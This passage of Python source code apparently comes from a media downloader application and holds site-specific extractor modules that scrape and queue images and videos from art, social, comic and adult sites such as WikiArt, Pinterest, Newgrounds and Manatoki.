'.jpeg', '.webp', '.webm', '.avi', '.mp4', '.mkv', '.wmv']: filename = '{}.jpg'.format(name) self.filename = filename return img self.url = LazyUrl(url, f, self) def get_username(url): if 'user/' in url: username = url.split('user/')[1].split('?')[0].split('/')[0] return username class Downloader_hf(Downloader): type = 'hf' URLS = ['hentai-foundry.com'] MAX_CORE = 16 display_name = 'Hentai Foundry' ACCEPT_COOKIES = [r'(.*\.)?hentai-foundry\.com'] def init(self): self.session = enter() @classmethod def fix_url(cls, url): username = get_username(url) return 'https://www.hentai-foundry.com/user/{}'.format(username) def read(self): username = get_username(self.url) self.title = username imgs = get_imgs(username, self.title, self.session, cw=self.cw) for img in imgs: self.urls.append(img.url) self.title = username @try_n(2) def enter(): print('enter') session = Session() r = session.get(URL_ENTER) # 862 html = r.text soup = Soup(html) box = soup.find('aside', id='FilterBox') data = {} for select in box.findAll('select'): name = select.attrs['name'] value = select.findAll('option')[-1].attrs['value'] print(name, value) data[name] = value for input in box.findAll('input'): name = input.attrs['name'] value = input.attrs['value'] if name.startswith('rating_') or 'CSRF_TOKEN' in name: print(name, value) data[name] = value data.update({ 'filter_media': 'A', 'filter_order': 'date_new', 'filter_type': '0', }) r = session.post(URL_FILTER, data=data, headers={'Referer': r.url}) print(r) return session def get_imgs(username, title, session, cw=None): url = 'https://www.hentai-foundry.com/pictures/user/{}'.format(username) #downloader.read_html(url_enter, session=session) hrefs = [] for p in range(100): check_alive(cw) print(url) html = downloader.read_html(url, session=session) soup = Soup(html) if soup.find('div', id='entryButtonContainer'): session = enter() continue tab = soup.find('a', class_='active') n = re.find(r'\(([0-9]+)', tab.text) view = soup.find('div', class_='galleryViewTable') for a in view.findAll('a', class_='thumbLink'): href = urljoin(url, a.attrs['href']) if href in hrefs: print('dup') continue hrefs.append(href) next = soup.find(lambda tag: tag.name == 'li' and tag.get('class') == ['next']) if next is None: break url = urljoin(url, next.a.attrs['href']) s = '{} {} ({} / {})'.format(tr_('읽는 중...'), title, len(hrefs), n) if cw: cw.setTitle(s) else: print(s) imgs = [] for href in hrefs: img = Image(href, session) imgs.append(img) return imgs File: src/extractor/file_downloader.py import downloader, os from utils import Downloader, query_url, clean_title, get_ext, Session from hashlib import md5 class Downloader_file(Downloader): type = 'file' single = True URLS = [] def init(self): self.session = Session() #6525 @classmethod def fix_url(cls, url): if url and '://' not in url: url = 'https://' + url.lstrip('/') return url def read(self): if not self.url.strip(): raise Exception('empty url') qs = query_url(self.url) for key in qs: if key.lower() in ('file', 'filename'): name = qs[key][(-1)] break else: name = self.url for esc in ['?', '#']: name = name.split(esc)[0] name = os.path.basename(name.strip('/')) try: ext = downloader.get_ext(self.url) except: ext = '' if not ext: ext = get_ext(name) name = os.path.splitext(name)[0] self.urls.append(self.url) id_ = md5(self.url.encode('utf8')).hexdigest()[:8] tail = ' ({}){}'.format(id_, ext) filename = clean_title(name, n=-len(tail)) + tail self.filenames[self.url] = filename self.title = filename File: src/extractor/wikiart_downloader.py 
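# Extractor for WikiArt (wikiart.org): pages through the artist's "all-paintings" JSON endpoint and queues each painting image.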
#coding:utf8 import downloader from utils import LazyUrl, Downloader, Session, get_print, clean_title, check_alive, json import os from translator import tr_ class Image: def __init__(self, url, referer, title, id): self.url = LazyUrl(referer, lambda _: url, self) ext = os.path.splitext(url.split('?')[0])[1] n = len(id) + len(ext) + 3 title = clean_title(title, n=-n) self.filename = '{} - {}{}'.format(id, title, ext) class Downloader_wikiart(Downloader): type = 'wikiart' URLS = ['wikiart.org'] display_name = 'WikiArt' ACCEPT_COOKIES = [r'(.*\.)?wikiart\.org'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): url = 'https://www.wikiart.org/en/{}'.format(get_id(url)) return url def read(self): artist = get_artist(get_id(self.url), self.session) self.artist = artist for img in get_imgs(self.url, artist, self.session, cw=self.cw): self.urls.append(img.url) self.title = clean_title(artist) def get_id(url): userid = url.split('?')[0].split('#')[0].split('wikiart.org/')[1].split('/')[1] return userid def get_imgs(url, artist, session, cw=None): print_ = get_print(cw) userid = get_id(url) print(userid) imgs = [] ids = set() for p in range(1, 100): check_alive(cw) url_api = 'https://www.wikiart.org/en/{}/mode/all-paintings?json=2&layout=new&page={}&resultType=masonry'.format(userid, p) print(url_api) data_raw = downloader.read_html(url_api, url, session=session) data = json.loads(data_raw) _imgs = data['Paintings'] n = data['AllPaintingsCount'] if not _imgs: print_('???') break for p in _imgs: img = p['image'] id = p['id'] referer = p['paintingUrl'] title = p['title'] if id in ids: print('duplicate: {}'.format(id)) continue ids.add(id) img = Image(img, referer, title, id) imgs.append(img) s = '{} {} - {} / {}'.format(tr_('읽는 중...'), artist, len(imgs), n) if cw: cw.setTitle(s) else: print(s) if len(imgs) == n: print_('full') break return imgs def get_artist(userid, session): url = 'https://www.wikiart.org/en/{}'.format(userid) soup = downloader.read_soup(url, session=session) return soup.find('h3').text.strip() File: src/extractor/pinter_downloader.py from utils import Session, Downloader, LazyUrl, clean_url, try_n, clean_title, get_ext, get_max_range, check_alive, limits, json import ree as re from translator import tr_ import urllib from m3u8_tools import playlist2stream, M3u8_stream BASE_URL = 'https://www.pinterest.com' class Downloader_pinter(Downloader): type = 'pinter' URLS = ['pinterest.'] type_pinter = 'board' display_name = 'Pinterest' ACCEPT_COOKIES = [r'(.*\.)?(pinterest)\.'] @try_n(4) def init(self): self.session = Session('chrome') self.api = PinterestAPI(self.session) self._pin_id = re.find(r'https?://.*pinterest\.[^/]+/pin/([0-9]+)', self.url) if self._pin_id is not None: self.type_pinter = 'pin' else: username, board = get_username_board(self.url) if '/' in board: self.type_pinter = 'section' if board == '_created': self.type_pinter = 'created' self.print_(f'type: {self.type_pinter}') if self.type_pinter in ['board', 'section', 'created']: self.info = get_info(username, board, self.api) elif self.type_pinter == 'pin': pass #5132 else: raise NotImplementedError(self.type_pinter) @classmethod def fix_url(cls, url): if 'pinterest.' 
not in url: url = f'https://www.pinterest.com/{url}' return url @property def name(self): if self.type_pinter == 'pin': return self._pin_id username = '' name = '' if self.type_pinter == 'created': username = self.info['native_creator']['username'] name = '_created' else: username = self.info['owner']['username'] name = self.info['name'] return clean_title(f'{username}/{name}') def read(self): if self.type_pinter == 'pin': self.single = True id = self._pin_id else: id = self.info['id'] self.title = self.name imgs = get_imgs(id, self.api, cw=self.cw, title=self.name, type=self.type_pinter) for img in imgs: self.urls.append(img.url) self.title = self.name def get_info(username, board, api): if '/' in board: section = '/'.join(board.split('/')[1:]) board = board.split('/')[0] info = api.board(username, board) for s in api.board_sections(info['id']): print(s['slug'].lower(), section) if s['slug'].lower() == section.lower(): break else: raise Exception('Invalid section') title = s['title'] info.update(s) info['name'] = f'{info["name"]}/{title}' print('section_id:', info['id']) elif board == '_created': info = api.board_created(username)[0] else: info = api.board(username, board) return info class PinterestAPI: HEADERS = { 'Accept': 'application/json, text/javascript, */*, q=0.01', 'Accept-Language': 'en-US,en;q=0.5', 'Referer': BASE_URL + '/', 'X-Requested-With': 'XMLHttpRequest', 'X-APP-VERSION' : '31461e0', 'X-Pinterest-AppState': 'active', 'Origin': BASE_URL, } def __init__(self, session): self.session = session self.session.headers.update(self.HEADERS) def pin(self, pin_id): options = {'id': pin_id, 'field_set_key': 'detailed'} return self._call('Pin', options)['resource_response']['data'] def pin_related(self, pin_id): options = {'pin': pin_id, 'add_vase': True, 'pins_only': True} return self._pagination('RelatedPinFeed', options) def board(self, user, board): options = {'slug': board, 'username': user, 'field_set_key': 'detailed'} return self._call('Board', options)['resource_response']['data'] def board_pins(self, board_id): options = {'board_id': board_id} return self._pagination('BoardFeed', options) def board_related(self, board_id): options = {'board_id': board_id, 'add_vase': True} return self._pagination('BoardRelatedPixieFeed', options) def board_sections(self, board_id): options = {'board_id': board_id} return self._pagination('BoardSections', options) def board_section_pins(self, section_id): options = {'section_id': section_id} return self._pagination('BoardSectionPins', options) def board_created(self, user): options = {'data': {}, 'username': user, 'field_set_key': 'grid_item'} return self._call('UserActivityPins', options)['resource_response']['data'] def board_created_pins(self, user): options = {'data': {}, 'username': user, 'field_set_key': 'grid_item'} return self._pagination('UserActivityPins', options) @try_n(4) @limits(4) # 1000 calls per hour def _call(self, resource, options): url = f'{BASE_URL}/resource/{resource}Resource/get/' params = {'data': json.dumps({'options': options}), 'source_url': ''} #print(f'_call: {url}, {params}') r = self.session.get(url, params=params) s = r.text status_code = r.status_code try: data = json.loads(s) except ValueError: data = {} if status_code < 400 and not r.history: return data if status_code == 404 or r.history: raise Exception('Not Found') raise Exception(f'API request failed: {status_code}') def _pagination(self, resource, options): while True: data = self._call(resource, options) if resource == 'UserActivityPins' and 
len(data['resource_response']['data']) == 0: return for x in data['resource_response']['data']: yield x try: bookmarks = data['resource']['options']['bookmarks'] if not bookmarks or bookmarks[0] == '-end-' or bookmarks[0].startswith('Y2JOb25lO'): return options['bookmarks'] = bookmarks except KeyError: return class Image: def __init__(self, img): self.id = img['id'] print(self.id) videos = img.get('videos') if videos and 'video_list' in videos: src = list(videos['video_list'].values())[0]['url'] else: src = img['images']['orig']['url'] ext = get_ext(src) if ext.lower() == '.m3u8': try: src = playlist2stream(src) except: src = M3u8_stream(src) ext = '.mp4' self.url = LazyUrl(f'{BASE_URL}/pin/{self.id}/', lambda _: src, self) self.filename = f'{self.id}{ext}' def get_imgs(id, api, cw=None, title=None, type='board'): n = get_max_range(cw) imgs = [] ids = set() print(f'get_imgs: type={type}') if type == 'board': gen = api.board_pins(id) elif type == 'section': gen = api.board_section_pins(id) elif type == 'pin': gen = [api.pin(id)] elif type == 'created': gen = api.board_created_pins(title.split('/')[0]) else: raise Exception(f'Type "{type}" is not supported') for img in gen: check_alive(cw) if 'images' not in img: print('skip img:', img['id']) continue img = Image(img) if type == 'pin' and img.id != id: raise AssertionError('id mismatch') if img.id in ids: print('duplicate:', img.id) continue ids.add(img.id) print(img.url) print(img.filename) print() imgs.append(img) if len(imgs) >= n: break if cw is not None: cw.setTitle('{} {} ({})'.format(tr_('읽는 중...'), title, len(imgs))) return imgs def get_username_board(url): url = clean_url(url) m = re.search('pinterest.[a-zA-Z.]+?/([^/]+)/([^#\\?]+)', url) username, board = m.groups() board = urllib.parse.unquote(board).strip() while board.endswith('/'): board = board[:-1].strip() return (username, board) File: src/extractor/pawoo_downloader.py #coding:utf8 from utils import Downloader, clean_title, Session, Soup, urljoin import clf2 from mastodon import get_info import ree as re def get_id(url): return re.find('pawoo.net/([^/]+)', url.lower()) class Downloader_pawoo(Downloader): type = 'pawoo' URLS = ['pawoo.net'] ACCEPT_COOKIES = [r'(.*\.)?pawoo\.net'] def init(self): self.session = Session() if get_id(self.url) == 'web': #6123 soup = Soup(clf2.solve(self.url)['html']) name = soup.find('div', class_='account__header__tabs__name') id_ = name.find('small').text.strip() self.url = urljoin(self.url, f'/{id_}') @classmethod def fix_url(cls, url): if url.endswith('/media'): url = url[:-len('/media')] id_ = get_id(url) or url if id_ == 'web': return url return f'https://pawoo.net/{id_}' def read(self): id_ = get_id(self.url) info = get_info('pawoo.net', id_, f'pawoo_{id_}', self.session, self.cw) self.urls += info['files'] self.title = clean_title('{} (pawoo_{})'.format(info['title'], id_)) File: src/extractor/manatoki_downloader.py from utils import Soup, try_n, Downloader, urljoin, get_print, Session, clean_title, get_ext, fix_title, lazy, get_imgs_already, check_alive, File, limits from translator import tr_ import page_selector import utils import clf2 import ree as re from PIL import Image class File_manatoki(File): type = 'manatoki' format = 'title/page:04;' show_pp = False def __init__(self, info): ext = get_ext(info['url']) if ext.lower()[1:] not in ['jpg', 'jpeg', 'bmp', 'png', 'gif', 'webm', 'webp']: ext = '.jpg' d = { 'title': info['title'], 'page': info['page'], 'chapterid': re.find(r'/comic/([0-9]+)', info['referer']), #6380 } info['name'] = 
utils.format('manatoki', d, ext) super().__init__(info) @limits(.5) def get(self): return {} def pp(self, filename): #5233 img = Image.open(filename) nf = getattr(img, 'n_frames', 1) loop = img.info.get('loop') if nf > 1 and loop: img.seek(nf-1) img.save(filename) img.close() return filename class Page: def __init__(self, title, url): self.title = clean_title(title) self.url = url self.id = int(re.find(r'/(comic|webtoon)/([0-9]+)', url, err='no id')[1]) class Downloader_manatoki(Downloader): type = 'manatoki' URLS = [r'regex:(mana|new)toki[0-9]*\.(com|net)'] MAX_CORE = 4 ACCEPT_COOKIES = [r'(.*\.)?(mana|new)toki[0-9]*\.(com|net)'] @try_n(2) def init(self): self.session, self.soup, url = get_soup(self.url, cw=self.cw) self.url = self.fix_url(url) # 2377 list = self.soup.find(attrs={'data-original-title': '목록'}) if list: url = urljoin(self.url, list.parent['href']) nav = self.soup.find('div', class_='toon-nav') select = nav.find('select', {'name': 'wr_id'}) for i, op in enumerate(select.findAll('option')[::-1]): if 'selected' in op.attrs: break else: raise Exception('no selected option') self.session, self.soup, url = get_soup(url, cw=self.cw) url_page = self.fix_url(url) for i, page in enumerate(get_pages(url_page, self.soup)): if page.id == int(op['value']): break else: raise Exception('can not find page') self.cw.range_p = [i] self.url = url_page self.name @classmethod def fix_url(cls, url): # 2377 m = re.find(r'/board.php\?bo_table=([0-9a-zA-Z_]+)&wr_id=([0-9]+)', url) if m: return urljoin(url, '/{}/{}'.format(*m)) return url.split('?')[0] @classmethod def key_id(cls, url): return '/'.join(url.split('/')[3:5]) @lazy def name(self): artist = get_artist(self.soup) title = self.soup.find('meta', {'name':'subject'})['content'].strip() return fix_title(self, title, artist) def read(self): self.title = tr_('읽는 중... 
{}').format(self.name) self.artist = get_artist(self.soup) imgs = get_imgs(self.url, self.name, self.soup, self.session, self.cw) for img in imgs: self.urls.append(img) self.title = self.name def get_artist(soup): view = soup.find('div', class_='view-title', err='no title') text = view.text.replace('\n', '#') artist = re.find(r'작가[ #]*:[ #]*(.+?)#', text, default='N/A').strip() return artist @limits(10) def get_soup(url, session=None, cw=None, win=None): if session is None: session = Session() virgin = True def f(html, browser=None): nonlocal virgin soup = Soup(html) if soup.find('form', {'name':'fcaptcha'}): #4660 browser.show() if virgin: virgin = False browser.runJavaScript('window.scrollTo({top: document.getElementsByClassName("form-box")[0].getBoundingClientRect().top-150})') #5504 return False browser.hide() return True res = clf2.solve(url, session=session, f=f, cw=cw, win=win) soup = Soup(res['html'], apply_css=True) return session, soup, res['url'] def get_pages(url, soup, sub=False): list = soup.find('ul', class_='list-body') pages = [] for item in list.findAll('div', 'wr-subject'): for span in item.a.findAll('span'): span.decompose() title = item.a.text.strip() href = item.a['href'] href = urljoin(url, href) pages.append((title, href)) if not pages: raise Exception('no pages') ## if sub: #4909 ## return pages ## else: ## pg = soup.find('ul', class_='pagination') ## as_ = pg.findAll('a') ## for a in as_: ## href = a.get('href') ## if not href: ## continue ## href = urljoin(url, href) ## for try_ in range(2): ## try: ## session, soup2, href = get_soup(href) ## pages += get_pages(href, soup2, sub=True) ## break ## except Exception as e: ## e_ = e ## print(e) ## else: ## raise e_ titles = {} pages_ = [] for title, href in pages[::-1]: title = utils.fix_dup(title, titles) #4161 page = Page(title, href) pages_.append(page) return pages_ @page_selector.register('manatoki') def f(url, win): session, soup, url = get_soup(url, win=win) list = soup.find('ul', class_='list-body') if list is None: raise Exception(tr_('목록 주소를 입력해주세요')) pages = get_pages(url, soup) return pages def get_imgs(url, title, soup=None, session=None, cw=None): print_ = get_print(cw) if soup is None or session is None: session, soup, url = get_soup(url, session, cw) pages = get_pages(url, soup) pages = page_selector.filter(pages, cw) imgs = [] for i, page in enumerate(pages): check_alive(cw) imgs_already = get_imgs_already('manatoki', title, page, cw) if imgs_already: imgs += imgs_already continue imgs_ = get_imgs_page(page, title, url, session, cw) imgs += imgs_ s = '{} {} / {} ({} / {})'.format(tr_('읽는 중...'), title, page.title, i+1, len(pages)) print_('{} {}'.format(page.title, len(imgs_))) if cw is not None: cw.setTitle(s) else: print('read page... 
{} ({})'.format(page.url, len(imgs))) return imgs @try_n(4) def get_imgs_page(page, title, referer, session, cw): print_ = get_print(cw) # 2183 session, soup, page.url = get_soup(page.url, session, cw) title_page = page.title#clean_title(soup.find('span', class_='page-desc').text.strip()) if page.title != title_page: print_('{} -> {}'.format(page.title, title_page)) page.title = title_page views = soup.findAll('div', class_='view-content')\ + soup.findAll('div', class_='view-padding') if not views: raise Exception('no views') hash = re.find(r'''data_attribute\s*:\s*['"](.+?)['"]''', soup.html) print_('hash: {}'.format(hash)) if hash is None: raise Exception('no hash') imgs = [] for view in views: if view is None: continue for img in view.findAll('img'): if not isVisible(img): continue src = img.get('data-{}'.format(hash)) src = src or img.get('content') # https://manatoki77.net/comic/5266935 if not src: continue img = urljoin(page.url, src) if '/img/cang' in img: continue if '/img/blank.gif' in img: continue img = File_manatoki({'referer': page.url, 'url': img, 'title': page.title, 'page': len(imgs)}) imgs.append(img) ## if not imgs: ## raise Exception('no imgs') return imgs def isVisible(tag): while tag: if re.search(r'display:\s*none', tag.get('style', ''), re.I): return False tag = tag.parent return True File: src/extractor/talk_op_gg_downloader.py # coding: UTF-8 # title: Download talk op.gg image # author: SaidBySolo # comment: op.gg 커뮤니티의 이미지를 다운로드합니다 """ MIT License Copyright (c) 2020 SaidBySolo Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
""" import requests from utils import Downloader, Soup class DownloaderTalkOPGG(Downloader): type = "talkopgg" URLS = ["talk.op.gg"] def init(self) -> None: pass def read(self) -> None: response = requests.get(self.url) soup = Soup(response.text) self.title = soup.find("title").text image_element_list = soup.find("div", class_="article-content").findAll("img") for image_element in image_element_list: self.urls.append(image_element["src"]) File: src/extractor/newgrounds_downloader.py # coding:utf8 from datetime import datetime import downloader import errors from functools import reduce import os import ree as re from timee import sleep from translator import tr_ from utils import Downloader, clean_title, Session, get_print, try_n, check_alive class Downloader_newgrounds(Downloader): type = 'newgrounds' URLS = ['newgrounds.com'] ACCEPT_COOKIES = [r'(.*\.)?newgrounds\.com'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): user = re.find(r'(?:http(?:s)?://)?([^\.]+).newgrounds.com', url.lower()) if not user or user == 'www': user = re.find(r'newgrounds.com/art/view/([^/?#]+)', url, err='no user id') return 'https://{}.newgrounds.com/art'.format(user) def read(self): user = re.find('(?:http(?:s)?://)?([^\.]+).newgrounds.com', self.url.lower()) title = clean_title(user) for img in get_imgs(user, title, self.session, self.cw): self.urls.append(img.url) self.filenames[img.url] = img.filename self.title = title class Image: def __init__(self, url, filename=None): self.url = url if filename is None: filename = os.path.basename(url) self.filename = filename @try_n(10, sleep=20) def get_posts(url, params, session, print_): posts, data, items = [], None, None try: data = session.get(url, params=params).json() items = data.get('items') if items: for item in reduce(lambda x, y: x + y, items.values()): posts.append(re.find('(?<=href=")([^"]+)', item)) except Exception as e: print_('failed to get posts') print_('no. posts: {}'.format(len(posts))) print_('data: {}'.format(data)) print_('items: {}'.format(items)) raise e return posts @try_n(10, sleep=20) def get_html(post, session): return downloader.read_html(post, session=session) def get_img(post, session, print_): html, url, name, ext, _datetime = None, None, None, None, None try: html = get_html(post, session) if 'You must be logged in, and at least 18 years of age to view this content!' 
in html: raise errors.LoginRequired() url = re.find('(?<="full_image_text":"<img src=\\\\")([^"]+)', html).replace('\\', '') name = re.find('(?<=alt=\\\\")([^\\\\]+)', html) ext = os.path.splitext(url)[1].split('?')[0] _datetime = datetime.strptime(re.find('(?<="datePublished" content=")([^"]+)', html), '%Y-%m-%dT%H:%M:%S%z') except Exception as e: print_('failed to get images') print_('post: {}'.format(post)) print_('url: {}'.format(url)) print_('name: {}'.format(name)) print_('ext: {}'.format(ext)) print_('_datetime: {}'.format(_datetime)) raise e return Image(url=url, filename='[{}] {}{}'.format(_datetime.strftime("%Y-%m-%d"), name, ext)) def get_imgs(user, title, session, cw=None): print_ = get_print(cw) imgs = [] url = 'https://{}.newgrounds.com/art'.format(user) params = {'page': 1, 'isAjaxRequest': 1} while check_alive(cw): posts = get_posts(url, params, session, print_) if not posts: break for post in posts: sleep(0.75) imgs.append(get_img(post, session, print_)) s = '{} {} - {}'.format(tr_('읽는 중...'), title, len(imgs)) if cw: cw.setTitle(s) print_('processed: {}'.format(len(imgs))) print_('page: {}'.format(params['page'])) params['page'] += 1 return imgs File: src/extractor/xnxx_downloader.py import downloader from utils import Soup, Downloader, LazyUrl, format_filename import ree as re from m3u8_tools import playlist2stream from io import BytesIO as IO class Video: def __init__(self, url, url_page, title, url_thumb): self._url = url self.url = LazyUrl(url_page, self.get, self) self.id = get_id(url_page) self.title = title self.filename = format_filename(title, self.id, '.mp4') f = IO() self.url_thumb = url_thumb downloader.download(url_thumb, buffer=f) self.thumb = f def get(self, _): return self._url def get_id(url): return url.split('xnxx.com/')[1].split('/')[0] class Downloader_xnxx(Downloader): type = 'xnxx' URLS = [r'regex:xnxx[0-9]*\.(com|es)'] single = True display_name = 'XNXX' ACCEPT_COOKIES = [r'(.*\.)?xnxx[0-9]*\.(com|es)'] @classmethod def fix_url(cls, url): return re.sub(r'xnxx[0-9]*\.(com|es)', 'xnxx.com', url) def read(self): video = get_video(self.url) self.urls.append(video.url) self.setIcon(video.thumb) self.title = video.title def get_video(url): html = downloader.read_html(url) soup = Soup(html) for script in soup.findAll('script'): script = script.text or script.string or '' hls = re.find(r'''html5player\.setVideoHLS\(['"](.+?)['"]''', script) if hls: break else: raise Exception('No VideoHLS') video = playlist2stream(hls) title = get_title(soup) url_thumb = soup.find('meta', {'property': 'og:image'}).attrs['content'].strip() video = Video(video, url, title, url_thumb) return video def get_title(soup): return soup.find('meta', {'property': 'og:title'}).attrs['content'].strip() File: src/extractor/baraag_downloader.py #coding:utf8 from utils import Downloader, clean_title, Session from mastodon import get_info import ree as re def get_id(url): return re.find('baraag.net/([^/]+)', url.lower()) class Downloader_baraag(Downloader): type = 'baraag' URLS = ['baraag.net'] display_name = 'baraag.net' ACCEPT_COOKIES = [r'(.*\.)?baraag\.net'] def init(self): self.session = Session() @classmethod def fix_url(cls, url): id_ = get_id(url) or url return f'https://baraag.net/{id_}' def read(self): id_ = get_id(self.url) info = get_info('baraag.net', id_, f'baraag_{id_}', self.session, self.cw) self.urls += info['files'] self.title = clean_title('{} (baraag_{})'.format(info['title'], id_)) File: src/extractor/navertv_downloader.py import downloader import ree as re from io 
import BytesIO as IO from utils import Downloader, LazyUrl, get_ext, format_filename, try_n import ytdl class Downloader_navertv(Downloader): type = 'navertv' single = True URLS = ['tv.naver.com'] display_name = 'Naver TV' ACCEPT_COOKIES = [r'(.*\.)?naver\.com'] @classmethod def fix_url(cls, url): if not re.match(r'https?://.+', url, re.I): url = f'https://tv.naver.com/v/{url}' return url def read(self): video = Video(self.url, cw=self.cw) video.url()# self.urls.append(video.url) self.setIcon(video.thumb) self.enableSegment() self.title = video.title class Video: _url = None def __init__(self, url, cw=None): self.url = LazyUrl(url, self.get, self) self.cw = cw @try_n(4) def get(self, url): if self._url: return self._url ydl = ytdl.YoutubeDL(cw=self.cw) info = ydl.extract_info(url) fs = [f for f in info['formats'] if f['protocol'] in ['http', 'https']] fs = sorted(fs, key=lambda f: int(f.get('width', 0)), reverse=True) if not fs: raise Exception('No MP4 videos') f = fs[0] self._url = f['url'] self.thumb_url = info['thumbnails'][0]['url'] self.thumb = IO() downloader.download(self.thumb_url, buffer=self.thumb) self.title = info['title'] id = info['id'] ext = get_ext(self._url) self.filename = format_filename(self.title, id, ext) return self._url File: src/extractor/lhscan_downloader.py #coding:utf8 import downloader from utils import Soup, urljoin, LazyUrl, Downloader, try_n, Session, clean_title, get_print, check_alive import os from translator import tr_ import page_selector import clf2 import utils import base64 import ree as re import errors ##from image_reader import QPixmap class Image: def __init__(self, url, page, p): self._url = url self.url = LazyUrl(page.url, self.get, self)#, pp=self.pp) ext = os.path.splitext(url)[1] if ext.lower()[1:] not in ['jpg', 'jpeg', 'bmp', 'png', 'gif', 'webm', 'webp']: ext = '.jpg' self.filename = '{}/{:04}{}'.format(page.title, p, ext) def get(self, _): return self._url ## def pp(self, filename): ## pixmap = QPixmap(filename) ## pixmap.save(filename) ## return filename class Page: def __init__(self, title, url): self.title = clean_title(title) self.url = url def get_soup_session(url, cw=None, win=None): print_ = get_print(cw) session = Session() res = clf2.solve(url, session=session, cw=cw, win=win) print_('{} -> {}'.format(url, res['url'])) if res['url'].rstrip('/') == 'https://welovemanga.one': raise errors.LoginRequired() return Soup(res['html']), session class Downloader_lhscan(Downloader): type = 'lhscan' URLS = [ #'lhscan.net', 'loveheaven.net', 'lovehug.net', 'welovemanga.', 'nicomanga.com', ] MAX_CORE = 16 display_name = 'LHScan' ACCEPT_COOKIES = [rf'(.*\.)?{domain}' for domain in URLS] def init(self): self.soup, self.session = get_soup_session(self.url, self.cw) try: self.name except: raise errors.Invalid('{}: {}'.format(tr_('목록 주소를 입력해주세요'), self.url)) @classmethod def fix_url(cls, url): url = url.replace('lovehug.net', 'welovemanga.one') url = url.replace('welovemanga.net', 'welovemanga.one') #4298 return url @property def name(self): title = self.soup.find('ul', class_='manga-info').find('h3').text return clean_title(title) def read(self): self.title = tr_('읽는 중... 
{}').format(self.name) imgs = get_imgs(self.url, self.name, self.session, self.soup, self.cw) for img in imgs: self.urls.append(img.url) self.title = self.name @try_n(8) def get_imgs_page(page, referer, session, cw=None): print_ = get_print(cw) print_(page.title) html = downloader.read_html(page.url, referer, session=session) if clf2._is_captcha(Soup(html)): #4124 html = clf2.solve(page.url, session, cw)['html'] if not html: raise Exception('empty html') try: html = html.replace('{}='.format(re.find(r"\$\(this\)\.attr\('(.+?)'", html, err='no cn')), 'data-src=') except: #5351 pass soup = Soup(html) m = re.find(r'''(load_image|imgsListchap)\(([0-9]+)''', html) if m: #6186 cid = m[1] if utils.domain(page.url, 2).lower() == 'nicomanga.com': url_api = urljoin(page.url, f'/app/manga/controllers/cont.imgsList.php?cid={cid}') else: url_api = urljoin(page.url, f'/app/manga/controllers/cont.listImg.php?cid={cid}') soup = downloader.read_soup(url_api, page.url, session=session) imgs = [] for img in soup.findAll('img', class_='chapter-img'): src = img.get('data-pagespeed-lazy-src') or img.get('data-src') or img.get('data-srcset') or img.get('data-aload') or img.get('data-original') or img['src'] try: src = base64.b64decode(src).strip().decode('utf8') except: pass src0 = src src = src.replace('welovemanga.one', '1')# src = urljoin(page.url, src).strip() if 'Credit_LHScan_' in src or '5e1ad960d67b2_5e1ad962338c7' in src: continue if 'fe132b3d32acc39f5adcea9075bedad4LoveHeaven' in src: continue if 'LoveHug_600cfd96e98ff.jpg' in src: continue if 'image_5f0ecf23aed2e.png' in src: continue if '/uploads/lazy_loading.gif' in src: continue if '/xstaff.jpg.pagespeed.ic.gPQ2SGcYaN.webp' in src: continue if '/uploads/loading-mm.gif' in src: continue src = src.replace('\n', '').replace('\r', '') #5238 #6105 ## if 'proxy.php?link=' not in src: #5351 ## src = 'https://welovekai.com/proxy.php?link=' + src #5238 if not imgs: print_(src0) print_(src) img = Image(src, page, len(imgs)) imgs.append(img) return imgs def get_pages(url, session, soup=None, cw=None): if soup is None: html = downloader.read_html(url, session=session) soup = Soup(html) tab = soup.find('ul', class_='list-chapters') pages = [] for li in tab.findAll('li'): text = li.find('div', class_='chapter-name').text.strip() href = li.parent['href'] href = urljoin(url, href) page = Page(text, href) pages.append(page) if not pages: raise Exception('no pages') return pages[::-1] @page_selector.register('lhscan') def f(url, win): soup, session = get_soup_session(url, win=win) pages = get_pages(url, session, soup=soup) return pages @try_n(2) def get_imgs(url, title, session, soup=None, cw=None): if soup is None: html = downloader.read_html(url, session=session) soup = Soup(html) pages = get_pages(url, session, soup, cw) pages = page_selector.filter(pages, cw) imgs = [] for i, page in enumerate(pages): check_alive(cw) imgs += get_imgs_page(page, url, session, cw) s = '{} {} / {} ({} / {})'.format(tr_('읽는 중...'), title, page.title, i+1, len(pages)) if cw is not None: cw.setTitle(s) else: print(s) return imgs File: src/extractor/tiktok_downloader.py import downloader import ree as re from utils import Soup, LazyUrl, Downloader, try_n, compatstr, get_print, Session, get_max_range, format_filename, json import clf2 import ytdl from urllib.parse import unquote PATTERN_VID = '/(v|video)/(?P<id>[0-9]+)' SHOW = True def is_captcha(soup, cw=None): r = soup.find('div', class_="verify-wrap") or soup.find('div', class_='captcha_verify_container') if r: 
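        # A verify/captcha container was found; log it so the caller can re-solve the page in a visible browser.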
